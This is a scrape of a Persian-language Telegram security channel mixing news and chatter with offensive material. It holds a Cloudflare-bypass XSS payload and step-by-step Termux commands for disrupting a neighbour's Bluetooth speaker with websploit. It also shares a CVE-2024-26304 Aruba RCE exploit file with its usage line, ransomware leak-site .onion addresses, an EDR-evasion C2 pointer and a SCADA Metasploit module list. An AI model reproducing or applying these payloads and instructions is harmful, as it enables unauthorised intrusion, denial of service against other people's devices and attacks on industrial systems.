P.F.K Security
1.61K subscribers
128 photos
38 videos
37 files
404 links
APT / Exploit / Malware / ICS / OT / Vulnerability Analysis / SE
Download Telegram
CLOUDFLARE BYPASS

<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>


@PfkSecurity
از دوستان کسی اکانت vip tryhackme داره فقط برای 3 روز لازم دارم
اگر دارید ممنون میشم به اشتراک بگذارید :

@Aptmoqx0
امروز سالگرد تاج‌گذاری شاهنشاه داریوش بزرگ هخامنشی هست

خداوند این کشور را از دشمن، از خشکسالی و دروغ محفوظ دارد.

@PfkSecurity
Media is too big
VIEW IN TELEGRAM
💡هک کیا: کنترل از راه دور خودروها فقط با پلاک

افشا:
https://samcurry.net/hacking-kia
@PfkSecurity
🚨گروه باج افزار جدید: نیتروژن : Nitrogen
nitrogenczslprh3xyw6lh5xyjvmsz7ciljoqxxknd7uymkfetfhgvqd.onion

@PfkSecurity
💡بعضی از شما پرسیده‌اید که URL برای دیدن آخرین نسخه‌های درام Evil Corp و LockBit چیست:

lockbitapt2d73krlbewgv27tquljgxr33xbwwsp6rkyieto7u4ncead.onion

@PfkSecurity
This media is not supported in your browser
VIEW IN TELEGRAM
💡دیداس چگونه کار می کند اما نگاهی سه بعدی ...
@PfkSecurity
سلام به همه، امروز در مورد یکی دیگر از کاربردهای جالب termux در گوشی هوشمندتان به شما خواهم گفت.

بیایید موقعیتی را تصور کنیم که در آن همسایگان نمک نخورده و ناکافی شما تصمیم گرفتند در شب موسیقی را از بلندگو/مرکز موسیقی بلوتوث خود پخش کنند. شرایط متفاوت است، اما اگر واقعا مردم شروع به گستاخی می کنند، پس من این راه حل را پیشنهاد می کنم

Termux را باز کنید و این دستورات را بنویسید:

apt install python3


pip install scapy

git clone https://github.com/The404Hacking/websploit

cd websploit

chmod 777 * websploit.py

python3 websploit.py


بعد، هر اسکنر بلوتوثی را باز کنید و آدرس دستگاه مورد نیاز خود را با نام پیدا کنید

سپس این دستورات را وارد کنید:

use bluetooth/bluetooth_pod

set bdaddr xx:xx:xx:xx:xx:xx

در اینجا xx را با آدرس دستگاه مورد نظر جایگزین کنید.

و وارد شوید - run

اکنون می توانید با آرامش در سکوت به رختخواب بروید.

@PfkSecurity
CVE-2024-26304.py
4.3 KB
CVE-2024-26304 RCE-exploit

HPE Aruba Device

usage:
python3 CVE-2024-26304.py -u https://127.0.0.1

@PfkSecurity
شورای استانداردهای امنیتی PCI (PCI SSC) راهنمای محدوده و بخش بندی خود را برای معماری های شبکه مدرن به روز کرده است.💪

با توجه به اینکه نسخه قبلی در سال 2017 منتشر شد (در صورت استفاده از حافظه) یک به روز رسانی بسیار خوب و مفید است. در طول این مدت، فناوری‌ها و شیوه‌هایی مانند میکروسرویس‌ها، چند ابری، میکروسگمنتیشن و معماری اعتماد صفر گسترده شده‌اند، که البته مستلزم نیاز به توسعه توصیه‌هایی برای طراحی و پیاده‌سازی ایمن، از جمله. و در زیرساخت های تحت پوشش الزامات PCI DSS💯

#pci #network #architecture
@PfkSecurity
https://github.com/MythicAgents/sliver/blob/main/blog/blog.md

شما می توانید از این فرآیند چیزهای زیادی بیاموزید، به عنوان مثال، از edr اجتناب کنید و سرورهای تیم را پیوند دهید
SCADA Hacking: Metasploit SCADA Modules

به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که می‌توانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است.

در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit که برای آزمایش/هک کردن SCADA/ICS مفید هستند را گردآوری کنم. لطفاً به خاطر داشته باشید که سایت‌های SCADA/ICS از سخت‌افزار و پروتکل‌های متنوعی استفاده می‌کنند، بنابراین شناسایی برای یک هک موفقیت‌آمیز حیاتی می‌شود. شما باید حداقل سازنده و پروتکل را بشناسید و سپس ماژول مناسب را از این لیست بیابید.
این اطلاعات در قالب زیر سازماندهی شده است.
ابزار/Exploit MSF-Update Developer/Vendor System(های) Metasploit مرجع
من معتقدم که اکثر این ستون ها با استثناهای احتمالی MSF-Update و System(s) توضیحی هستند.
ستون MSF-Update نشان می دهد که آیا ماژول هنگام به روز رسانی در Metasploit در دسترس است یا خیر. برخی از ماژول ها به طور خودکار به روز می شوند و به Metasploit Framework شما اضافه می شوند. برخی دیگر، احتمالاً باید به صورت دستی اضافه کنید.
@pfksecurity
P.F.K Security
SCADA Hacking: Metasploit SCADA Modules به عنوان یک پنتستر/هکر ، ما منابع زیادی داریم که می‌توانیم از آنها برای آزمایش امنیت سیستم SCADA/ICS استفاده کنیم. یکی از محبوب ترین آنها فریم ورک Metasploit است. در اینجا، من سعی کرده ام لیستی از اکثر ماژول های Metasploit…
ستون System(s) سیستم های آسیب پذیر در برابر ماژول اکسپلویت/اسکنر را نشان می دهد. یک بار دیگر می خواهم بر ماهیت متنوع سیستم های SCADA/ICS تاکید کنم.
لطفاً توجه داشته باشید که ماژول‌ها از ماژول‌های بهره‌برداری و ماژول‌های کمکی (عمدتاً برای recon استفاده می‌شوند) متفاوت هستند.

@pfksecurity